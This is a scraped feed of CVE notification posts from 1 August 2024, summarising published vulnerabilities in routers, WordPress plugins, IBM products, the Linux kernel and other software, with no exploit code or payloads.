🚨 CVE-2024-38761Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Dylan James Zephyr Project Manager.This issue affects Zephyr Project Manager: from n/a through 3.3.99.🎖@cveNotify |
|
| 2024-08-01 22:37:39 |
🚨 CVE-2024-32931Under certain circumstances the exacqVision Web Service can expose authentication token details within communications.🎖@cveNotify |
|
| 2024-08-01 22:37:36 |
🚨 CVE-2024-32862Under certain circumstances the ExacqVision Web Services does not provide sufficient protection from untrusted domains.🎖@cveNotify |
|
| 2024-08-01 22:37:35 |
🚨 CVE-2024-6230The پلاگین پرداخت دلخواه WordPress plugin through 2.9.8 does not have CSRF check in place when resetting its form fields, which could allow attackers to make a logged in admin perform such action via a CSRF attack🎖@cveNotify |
|
| 2024-08-01 22:37:34 |
🚨 CVE-2024-5602A stack-based buffer overflow vulnerability due to a missing bounds check in the NI I/O Trace Tool may result in arbitrary code execution. Successful exploitation requires an attacker to provide a user with a specially crafted nitrace file.The NI I/O Trace tool is installed as part of the NI System Configuration utilities included with many NI software products. Refer to the NI Security Advisory for identifying the version of NI IO Trace.exe installed. The NI I/O Trace tool was also previously released as NI Spy.🎖@cveNotify |
|
| 2024-08-01 22:37:31 |
🚨 CVE-2024-6647** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical has been found in Croogo up to 4.0.7. This affects an unknown part of the file admin/settings/settings/prefix/Theme of the component Setting Handler. The manipulation of the argument Content-Type leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271053 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-01 22:37:30 |
🚨 CVE-2024-5633Longse model LBH30FE200W cameras, as well as products based on this device, provide an unrestricted access for an attacker located in the same local network to an undocumented binary service CoolView on one of the ports. An attacker with a knowledge of the available commands is able to perform read/write operations on the device's memory, which might result in e.g. bypassing telnet login and obtaining full access to the device.🎖@cveNotify |
|
| 2024-08-01 22:37:29 |
🚨 CVE-2024-5632Longse NVR (Network Video Recorder) model NVR3608PGE2W, as well as products based on this device, create a WiFi network with a default password.A user is neither advised to change it during the installation process, nor such a need is described in the manual. As the cameras from the same kit connect automatically, it is very probable for the default password to be left unchanged.🎖@cveNotify |
|
| 2024-08-01 22:37:26 |
🚨 CVE-2024-5631Longse NVR (Network Video Recorder) model NVR3608PGE2W, as well as products based on this device, are transmitting user's login and password to a remote control service without using any encryption. This enables an on-path attacker to eavesdrop the credentials and subsequently obtain access to the video stream. The credentials are being sent when a user decides to change his password in router's portal.🎖@cveNotify |
|
| 2024-08-01 22:37:25 |
🚨 CVE-2024-2463Weak password recovery mechanism in CDeX application allows to retrieve password reset token.This issue affects CDeX application versions through 5.7.1.🎖@cveNotify |
|
| 2024-08-01 22:37:24 |
🚨 CVE-2022-3996If an X.509 certificate contains a malformed policy constraint andpolicy processing is enabled, then a write lock will be taken twicerecursively. On some operating systems (most widely: Windows) thisresults in a denial of service when the affected process hangs. Policyprocessing being enabled on a publicly facing server is not consideredto be a common setup.Policy processing is enabled by passing the `-policy'argument to the command line utilities or by calling the`X509_VERIFY_PARAM_set1_policies()' function.Update (31 March 2023): The description of the policy processing enablementwas corrected based on CVE-2023-0466.🎖@cveNotify |
|
| 2024-08-01 21:37:42 |
🚨 CVE-2024-38772Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Crocoblock JetWidgets for Elementor and WooCommerce allows PHP Local File Inclusion.This issue affects JetWidgets for Elementor and WooCommerce: from n/a through 1.1.7.🎖@cveNotify |
|
| 2024-08-01 21:37:41 |
🚨 CVE-2024-38746Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in MakeStories Team MakeStories (for Google Web Stories) allows Path Traversal, Server Side Request Forgery.This issue affects MakeStories (for Google Web Stories): from n/a through 3.0.3.🎖@cveNotify |
|
| 2024-08-01 21:37:40 |
🚨 CVE-2024-32864Under certain circumstances exacqVision Web Services will not enforce secure web communications (HTTPS)🎖@cveNotify |
|
| 2024-08-01 21:37:36 |
🚨 CVE-2023-52209Improper Privilege Management vulnerability in WPForms, LLC. WPForms User Registration allows Privilege Escalation.This issue affects WPForms User Registration: from n/a through 2.1.0.🎖@cveNotify |
|
| 2024-08-01 21:37:35 |
🚨 CVE-2024-4963** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DAR-7000-40 V31R02B1413C. This affects an unknown part of the file /url/url.php. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264531. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-01 21:37:31 |
🚨 CVE-2024-4961** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical was found in D-Link DAR-7000-40 V31R02B1413C. Affected by this vulnerability is an unknown functionality of the file /user/onlineuser.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264529 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-01 21:37:30 |
🚨 CVE-2024-4699** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DAR-8000-10 up to 20230922. This issue affects some unknown processing of the file /importhtml.php. The manipulation of the argument sql leads to deserialization. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-263747. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-01 21:37:29 |
🚨 CVE-2024-3764** DISPUTED ** A vulnerability classified as problematic has been found in Tuya SDK up to 5.0.x. Affected is an unknown function of the component MQTT Packet Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. Upgrading to version 5.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-260604. NOTE: The vendor explains that a malicious actor would have to crack TLS first or use a legitimate login to initiate the attack.🎖@cveNotify |
|
| 2024-08-01 21:37:26 |
🚨 CVE-1999-0052IP fragmentation denial of service in FreeBSD allows a remote attacker to cause a crash.🎖@cveNotify |
|
| 2024-08-01 21:37:25 |
🚨 CVE-1999-0066AnyForm CGI remote execution.🎖@cveNotify |
|
| 2024-08-01 21:37:24 |
🚨 CVE-1999-0084Certain NFS servers allow users to use mknod to gain privileges by creating a writable kmem device and setting the UID to 0.🎖@cveNotify |
|
| 2024-08-01 21:07:25 |
🚨 CVE-2024-38329IBM Storage Protect for Virtual Environments: Data Protection for VMware 8.1.0.0 through 8.1.22.0 could allow a remote authenticated attacker to bypass security restrictions, caused by improper validation of user permission. By sending a specially crafted request, an attacker could exploit this vulnerability to change its settings, trigger backups, restore backups, and also delete all previous backups via log rotation. IBM X-Force ID: 294994.🎖@cveNotify |
|
| 2024-08-01 21:07:24 |
🚨 CVE-2024-31870IBM Db2 for i 7.2, 7.3, 7.4, and 7.5 supplies user defined table function is vulnerable to user enumeration by a local authenticated attacker, without having authority to the related *USRPRF objects. This can be used by a malicious actor to gather information about users that can be targeted in further attacks. IBM X-Force ID: 287174.🎖@cveNotify |
|
| 2024-08-01 20:37:42 |
🚨 CVE-2024-0025In sendIntentSender of ActivityManagerService.java, there is a possible background activity launch due to a logic error. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-01 20:37:41 |
🚨 CVE-2024-3274** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259285 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-01 20:37:37 |
🚨 CVE-2024-3272** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very critical, has been found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. This issue affects some unknown processing of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument user with the input messagebus leads to hard-coded credentials. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259283. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-01 20:37:36 |
🚨 CVE-2024-3138** DISPUTED ** A vulnerability was found in francoisjacquet RosarioSIS 11.5.1. It has been rated as problematic. This issue affects some unknown processing of the component Add Portal Note. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The associated identifier of this vulnerability is VDB-258911. NOTE: The vendor explains that the PDF is opened by the browser app in a sandbox, so no data from the website should be accessible.🎖@cveNotify |
|
| 2024-08-01 20:37:35 |
🚨 CVE-2024-3128** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, has been found in Replify-Messenger 1.0 on Android. This issue affects some unknown processing of the file androidmanifest.xml of the component Backup File Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier VDB-258869 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: The vendor was contacted early and responded very quickly. He does not intend to maintain the app anymore and will revoke the availability in the Google Play Store.🎖@cveNotify |
|
| 2024-08-01 20:37:32 |
🚨 CVE-2024-1983The Simple Ajax Chat WordPress plugin before 20240223 does not prevent visitors from using malicious Names when using the chat, which will be reflected unsanitized to other users.🎖@cveNotify |
|
| 2024-08-01 20:37:31 |
🚨 CVE-2024-2567** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, was found in jurecapuder AndroidWeatherApp 1.0.0 on Android. Affected is an unknown function of the file androidmanifest.xml of the component Backup File Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. VDB-257070 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: The code maintainer was contacted early about this disclosure but did not respond in any way. Instead the GitHub repository got deleted after a few days. We have to assume that the product is not supported anymore.🎖@cveNotify |
|
| 2024-08-01 20:37:30 |
🚨 CVE-2019-10143It was discovered freeradius up to and including version 3.0.19 does not correctly configure logrotate, allowing a local attacker who already has control of the radiusd user to escalate his privileges to root, by tricking logrotate into writing a radiusd-writable file to a directory normally inaccessible by the radiusd user. NOTE: the upstream software maintainer has stated "there is simply no way for anyone to gain privileges through this alleged issue."🎖@cveNotify |
|
| 2024-08-01 20:37:26 |
🚨 CVE-1999-0069Solaris ufsrestore buffer overflow.🎖@cveNotify |
|
| 2024-08-01 20:37:25 |
🚨 CVE-1999-0036IRIX login program with a nonzero LOCKOUT parameter allows creation or damage to files.🎖@cveNotify |
|
| 2024-08-01 20:07:25 |
🚨 CVE-2024-38603In the Linux kernel, the following vulnerability has been resolved:drivers/perf: hisi: hns3: Actually use devm_add_action_or_reset()pci_alloc_irq_vectors() allocates an irq vector. When devm_add_action()fails, the irq vector is not freed, which leads to a memory leak.Replace the devm_add_action with devm_add_action_or_reset to ensurethe irq vector can be destroyed when it fails.🎖@cveNotify |
|
| 2024-08-01 20:07:24 |
🚨 CVE-2024-38583In the Linux kernel, the following vulnerability has been resolved:nilfs2: fix use-after-free of timer for log writer threadPatch series "nilfs2: fix log writer related issues".This bug fix series covers three nilfs2 log writer-related issues,including a timer use-after-free issue and potential deadlock issue onunmount, and a potential freeze issue in event synchronization foundduring their analysis. Details are described in each commit log.This patch (of 3):A use-after-free issue has been reported regarding the timer sc_timer onthe nilfs_sc_info structure.The problem is that even though it is used to wake up a sleeping logwriter thread, sc_timer is not shut down until the nilfs_sc_info structureis about to be freed, and is used regardless of the thread's lifetime.Fix this issue by limiting the use of sc_timer only while the log writerthread is alive.🎖@cveNotify |
|
| 2024-08-01 19:37:30 |
🚨 CVE-2024-0778** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in Uniview ISC 2500-S up to 20210930. Affected by this issue is the function setNatConfig of the file /Interface/DevManage/VM.php. The manipulation of the argument natAddress/natPort/natServerPort leads to os command injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251696. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-01 19:37:26 |
🚨 CVE-1999-1588Buffer overflow in nlps_server in Sun Solaris x86 2.4, 2.5, and 2.5.1 allows remote attackers to execute arbitrary code as root via a long string beginning with "NLPS:002:002:" to the listen (aka System V listener) port, TCP port 2766.🎖@cveNotify |
|
| 2024-08-01 19:37:25 |
🚨 CVE-1999-0006Buffer overflow in POP servers based on BSD/Qualcomm's qpopper allows remote attackers to gain root access using a long PASS command.🎖@cveNotify |
|
| 2024-08-01 19:37:24 |
🚨 CVE-1999-0013Stolen credentials from SSH clients via ssh-agent program, allowing other local users to access remote accounts belonging to the ssh-agent user.🎖@cveNotify |
|
| 2024-08-01 19:07:25 |
🚨 CVE-2024-37831Itsourcecode Payroll Management System 1.0 is vulnerable to SQL Injection in payroll_items.php via the ID parameter.🎖@cveNotify |
|
| 2024-08-01 19:07:24 |
🚨 CVE-2024-37849A SQL Injection vulnerability in itsourcecode Billing System 1.0 allows a local attacker to execute arbitrary code in process.php via the username parameter.🎖@cveNotify |
|
| 2024-08-01 18:37:42 |
🚨 CVE-2024-7360A vulnerability classified as problematic has been found in SourceCodester Tracking Monitoring Management System 1.0. This affects an unknown part of the file /ajax.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273339.🎖@cveNotify |
|
| 2024-08-01 18:37:41 |
🚨 CVE-2024-7256Insufficient data validation in Dawn in Google Chrome on Android prior to 127.0.6533.88 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-01 18:37:38 |
🚨 CVE-2024-7255Out of bounds read in WebTransport in Google Chrome prior to 127.0.6533.88 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-01 18:37:37 |
🚨 CVE-2024-6412The HTML Forms WordPress plugin before 1.3.34 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks🎖@cveNotify |
|
| 2024-08-01 18:37:36 |
🚨 CVE-2024-25041IBM Cognos Analytics 11.2.0, 11.2.1, 11.2.2, 11.2.3, 11.2.4, 12.0.0, 12.0.1, and 12.0.2 is potentially vulnerable to cross site scripting (XSS). A remote attacker could execute malicious commands due to improper validation of column headings in Cognos Assistant. IBM X-Force ID: 282780.🎖@cveNotify |
|
| 2024-08-01 18:37:32 |
🚨 CVE-2024-32113Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13.Users are recommended to upgrade to version 18.12.13, which fixes the issue.🎖@cveNotify |
|
| 2024-08-01 18:37:31 |
🚨 CVE-2023-46051TeX Live 944e257 allows a NULL pointer dereference in texk/web2c/pdftexdir/tounicode.c. NOTE: this is disputed because it should be categorized as a usability problem.🎖@cveNotify |
|
| 2024-08-01 18:37:30 |
🚨 CVE-2024-21505Versions of the package web3-utils before 4.2.1 are vulnerable to Prototype Pollution via the utility functions format and mergeDeep, due to insecure recursive merge.An attacker can manipulate an object's prototype, potentially leading to the alteration of the behavior of all objects inheriting from the affected prototype by passing specially crafted input to these functions.🎖@cveNotify |
|
| 2024-08-01 18:37:26 |
🚨 CVE-2023-42374An issue in mystenlabs Sui Blockchain before v.1.6.3 allow a remote attacker to execute arbitrary code and cause a denial of service via a crafted compressed script to the Sui node component.🎖@cveNotify |
|
| 2024-08-01 18:37:25 |
🚨 CVE-2023-23513A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Big Sur 11.7.3, macOS Ventura 13.2, macOS Monterey 12.6.3. Mounting a maliciously crafted Samba network share may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-08-01 18:37:24 |
🚨 CVE-2022-48257In Eternal Terminal 6.2.1, etserver and etclient have predictable logfile names in /tmp.🎖@cveNotify |
|
| 2024-08-01 18:07:30 |
🚨 CVE-2024-7331A vulnerability was found in TOTOLINK A3300R 17.0.0cu.557_B20221024 and classified as critical. Affected by this issue is the function UploadCustomModule of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument File leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-273254 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-01 18:07:26 |
🚨 CVE-2022-38383IBM Cloud Pak for Security (CP4S) 1.10.0.0 through 1.10.11.0 and IBM QRadar Software Suite 1.10.12.0 through 1.10.21.0 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 233673.🎖@cveNotify |
|
| 2024-08-01 18:07:25 |
🚨 CVE-2024-31919IBM MQ 9.0 LTS, 9.1 LTS, 9.2 LTS, 9.3 LTS and 9.3 CD, in certain configurations, is vulnerable to a denial of service attack caused by an error processing messages when an API Exit using MQBUFMH is used. IBM X-Force ID: 290259.🎖@cveNotify |
|
| 2024-08-01 18:07:24 |
🚨 CVE-2024-31912IBM MQ 9.3 LTS and 9.3 CD could allow an authenticated user to escalate their privileges under certain configurations due to incorrect privilege assignment. IBM X-Force ID: 289894.🎖@cveNotify |
|
| 2024-08-01 17:37:30 |
🚨 CVE-2024-7211The Identity Server used by 1E Platform could enable URL redirection to untrusted sites.Note: The Identity Server on 1E Platform has been updated with the necessary patch.🎖@cveNotify |
|
| 2024-08-01 17:37:26 |
🚨 CVE-2024-5790The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ attribute within the plugin's Gradient Heading widget in all versions up to, and including, 3.11.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-01 17:37:25 |
🚨 CVE-2024-5666The Extensions for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ parameter within the EE Button widget in all versions up to, and including, 2.0.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-01 17:37:24 |
🚨 CVE-2024-35139IBM Security Access Manager Docker 10.0.0.0 through 10.0.7.1 could allow a local user to obtain sensitive information from the container due to incorrect default permissions. IBM X-Force ID: 292415.🎖@cveNotify |
|
| 2024-08-01 17:07:30 |
🚨 CVE-2024-6923There is a MEDIUM severity vulnerability affecting CPython.The email module didn’t properly quote newlines for email headers when serializing an email message allowing for header injection when an email is serialized.🎖@cveNotify |
|
| 2024-08-01 17:07:26 |
🚨 CVE-2024-6265The UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘uwp_sort_by’ parameter in all versions up to, and including, 1.2.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-08-01 17:07:25 |
🚨 CVE-2024-5598The Advanced File Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.2.4 via the 'fma_local_file_system' function. This makes it possible for unauthenticated attackers to extract sensitive data including backups or other sensitive information if the files have been moved to the built-in Trash folder.🎖@cveNotify |
|
| 2024-08-01 17:07:24 |
🚨 CVE-2024-5192The Funnel Builder for WordPress by FunnelKit – Customize WooCommerce Checkout Pages, Create Sales Funnels, Order Bumps & One Click Upsells plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘mimes’ parameter in all versions up to, and including, 3.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-01 16:37:38 |
🚨 CVE-2024-6873It is possible to crash or redirect the execution flow of the ClickHouse server process from an unauthenticated vector by sending a specially crafted request to the ClickHouse server native interface. This redirection is limited to what is available within a 256-byte range of memory at the time of execution, and no known remote code execution (RCE) code has been produced or exploited. Fixes have been merged to all currently supported version of ClickHouse. If you are maintaining your own forked version of ClickHouse or using an older version and cannot upgrade, the fix for this vulnerability can be found in this commit https://github.com/ClickHouse/ClickHouse/pull/64024 .🎖@cveNotify |
|
| 2024-08-01 16:37:37 |
🚨 CVE-2024-6040In parisneo/lollms-webui version v9.8, the lollms_binding_infos is missing the client_id parameter, which leads to multiple security vulnerabilities. Specifically, the endpoints /reload_binding, /install_binding, /reinstall_binding, /unInstall_binding, /set_active_binding_settings, and /update_binding_settings are susceptible to CSRF attacks and local attacks. An attacker can exploit this vulnerability to perform unauthorized actions on the victim's machine.🎖@cveNotify |
|
| 2024-08-01 16:37:33 |
🚨 CVE-2024-41265A TLS certificate verification issue discovered in cortex v0.42.1 allows attackers to obtain sensitive information via the makeOperatorRequest function.🎖@cveNotify |
|
| 2024-08-01 16:37:32 |
🚨 CVE-2024-41260A static initialization vector (IV) in the encrypt function of netbird v0.28.4 allows attackers to obtain sensitive information.🎖@cveNotify |
|
| 2024-08-01 16:37:31 |
🚨 CVE-2024-3182Install-type password disclosure vulnerability in Universal Installer including the Silent Installer in TIBCO Hawk versions 6.2.0, 6.2.1, 6.2.2 and 6.2.3 allows user's Enterprise Message Service (EMS) password to be exposed outside of the hawkagent.cfg and hawkevent.cfg config files.🎖@cveNotify |
|
| 2024-08-01 16:37:27 |
🚨 CVE-2024-23576Security vulnerability in HCL Commerce 9.1.12 and 9.1.13 could allow denial of service, disclosure of user personal data, and performing of unauthorized administrative operations.🎖@cveNotify |
|
| 2024-08-01 16:37:26 |
🚨 CVE-2024-28405SEMCMS 4.8 is vulnerable to Incorrect Access Control. The code installs SEMCMS_Funtion.php before checking if the admin is a valid user in the admin page because authentication function is called from there, users gain admin privileges.🎖@cveNotify |
|
| 2024-08-01 16:37:25 |
🚨 CVE-2024-29650An issue in @thi.ng/paths v.5.1.62 and before allows a remote attacker to execute arbitrary code via the mutIn and mutInManyUnsafe components.🎖@cveNotify |
|
| 2024-08-01 16:37:24 |
🚨 CVE-2023-0567In PHP 8.0.X before 8.0.28, 8.1.X before 8.1.16 and 8.2.X before 8.2.3, password_verify() function may accept some invalid Blowfish hashes as valid. If such invalid hash ever ends up in the password database, it may lead to an application allowing any password for this entry as valid.🎖@cveNotify |
|
| 2024-08-01 15:37:43 |
🚨 CVE-2024-39607OS command injection vulnerability exists in ELECOM wireless LAN routers. A specially crafted request may be sent to the affected product by a logged-in user with an administrative privilege to execute an arbitrary OS command.🎖@cveNotify |
|
| 2024-08-01 15:37:39 |
🚨 CVE-2024-41255filestash v0.4 is configured to skip TLS certificate verification when using the FTPS protocol, possibly allowing attackers to execute a man-in-the-middle attack via the Init function of index.go.🎖@cveNotify |
|
| 2024-08-01 15:37:38 |
🚨 CVE-2024-6272The SpiderContacts WordPress plugin through 1.1.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-08-01 15:37:37 |
🚨 CVE-2024-34009Insufficient checks whether ReCAPTCHA was enabled made it possible to bypass the checks on the login page. This did not affect other pages where ReCAPTCHA is utilized.🎖@cveNotify |
|
| 2024-08-01 15:37:33 |
🚨 CVE-2024-30166In Mbed TLS 3.3.0 through 3.5.2 before 3.6.0, a malicious client can cause information disclosure or a denial of service because of a stack buffer over-read (of less than 256 bytes) in a TLS 1.3 server via a TLS 3.1 ClientHello.🎖@cveNotify |
|
| 2024-08-01 15:37:32 |
🚨 CVE-2024-29686Server-side Template Injection (SSTI) vulnerability in Winter CMS v.1.2.3 allows a remote attacker to execute arbitrary code via a crafted payload to the CMS Pages field and Plugin components. NOTE: the vendor disputes this because the payload could only be entered by a trusted user, such as the owner of the server that hosts Winter CMS, or a developer working for them.🎖@cveNotify |
|
| 2024-08-01 15:37:31 |
🚨 CVE-2024-30631Tenda FH1205 v2.0.0.7(775) has a stack overflow vulnerability in the schedStartTime parameter from setSchedWifi function.🎖@cveNotify |
|
| 2024-08-01 15:37:27 |
🚨 CVE-2024-30613Tenda AC15 v15.03.05.18 has a stack overflow vulnerability in the time parameter from the setSmartPowerManagement function.🎖@cveNotify |
|
| 2024-08-01 15:37:26 |
🚨 CVE-2023-42913This issue was addressed through improved state management. This issue is fixed in macOS Sonoma 14.2. Remote Login sessions may be able to obtain full disk access permissions.🎖@cveNotify |
|
| 2024-08-01 15:37:25 |
🚨 CVE-2024-30612Tenda AC10U v15.03.06.48 has a stack overflow vulnerability in the deviceId, limitSpeed, limitSpeedUp parameter from formSetClientState function.🎖@cveNotify |
|
| 2024-08-01 15:37:24 |
🚨 CVE-2024-30588Tenda FH1202 v1.2.0.14(408) has a stack overflow vulnerability in the schedStartTime parameter of the setSchedWifi function.🎖@cveNotify |
|
| 2024-08-01 14:37:31 |
🚨 CVE-2024-27897Input verification vulnerability in the call module.Impact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-08-01 14:37:30 |
🚨 CVE-2023-52537Vulnerability of package name verification being bypassed in the HwIms module.Impact: Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-08-01 14:37:26 |
🚨 CVE-2024-30998SQL Injection vulnerability in PHPGurukul Men Salon Management System v.2.0, allows remote attackers to execute arbitrary code and obtain sensitive information via the email parameter in the index.php component.🎖@cveNotify |
|
| 2024-08-01 14:37:25 |
🚨 CVE-2023-24023Bluetooth BR/EDR devices with Secure Simple Pairing and Secure Connections pairing in Bluetooth Core Specification 4.2 through 5.4 allow certain man-in-the-middle attacks that force a short key length, and might lead to discovery of the encryption key and live injection, aka BLUFFS.🎖@cveNotify |
|
| 2024-08-01 14:37:24 |
🚨 CVE-2013-3632The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.🎖@cveNotify |
|
| 2024-08-01 14:07:52 |
🚨 CVE-2018-7311PrivateVPN 2.0.31 for macOS suffers from a root privilege escalation vulnerability. The software installs a privileged helper tool that runs as the root user. This privileged helper tool is installed as a LaunchDaemon and implements an XPC service. The XPC service is responsible for handling new VPN connection operations via the main PrivateVPN application. The privileged helper tool creates new VPN connections by executing the openvpn binary located in the /Applications/PrivateVPN.app/Contents/Resources directory. The openvpn binary can be overwritten by the default user, which allows an attacker that has already installed malicious software as the default user to replace the binary. When a new VPN connection is established, the privileged helper tool will launch this malicious binary, thus allowing an attacker to execute code as the root user. NOTE: the vendor has reportedly indicated that this behavior is "an acceptable part of their software.🎖@cveNotify |
|
| 2024-08-01 14:07:49 |
🚨 CVE-2018-5279In Malwarebytes Premium 3.3.1.2183, the driver file (FARFLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x9c40e02c. NOTE: the vendor reported that they "have not been able to reproduce the issue on any Windows operating system version (32-bit or 64-bit).🎖@cveNotify |
|
| 2024-08-01 14:07:48 |
🚨 CVE-2017-17058The WooCommerce plugin through 3.x for WordPress has a Directory Traversal Vulnerability via a /wp-content/plugins/woocommerce/templates/emails/plain/ URI, which accesses a parent directory. NOTE: a software maintainer indicates that Directory Traversal is not possible because all of the template files have "if (!defined('ABSPATH')) {exit;}" code🎖@cveNotify |
|
| 2024-08-01 14:07:47 |
🚨 CVE-2017-10955This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of EMC Data Protection Advisor 6.3.0. Authentication is required to exploit this vulnerability. The specific flaw exists within the EMC DPA Application service, which listens on TCP port 9002 by default. When parsing the preScript parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute arbitrary code under the context of SYSTEM. Was ZDI-CAN-4697. NOTE: Dell EMC disputes that this is a vulnerability🎖@cveNotify |
|
| 2024-08-01 14:07:43 |
🚨 CVE-2017-7306Riverbed RiOS through 9.6.0 has a weak default password for the secure vault, which makes it easier for physically proximate attackers to defeat the secure-vault protection mechanism by leveraging knowledge of the password algorithm and the appliance serial number. NOTE: the vendor believes that this does not meet the definition of a vulnerability. The product contains correct computational logic for supporting arbitrary password changes by customers; however, a password change is optional to meet different customers' needs🎖@cveNotify |
|
| 2024-08-01 14:07:42 |
🚨 CVE-2017-7264Use-after-free vulnerability in the fz_subsample_pixmap function in fitz/pixmap.c in Artifex MuPDF 1.10a allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted document.🎖@cveNotify |
|
| 2024-08-01 14:07:41 |
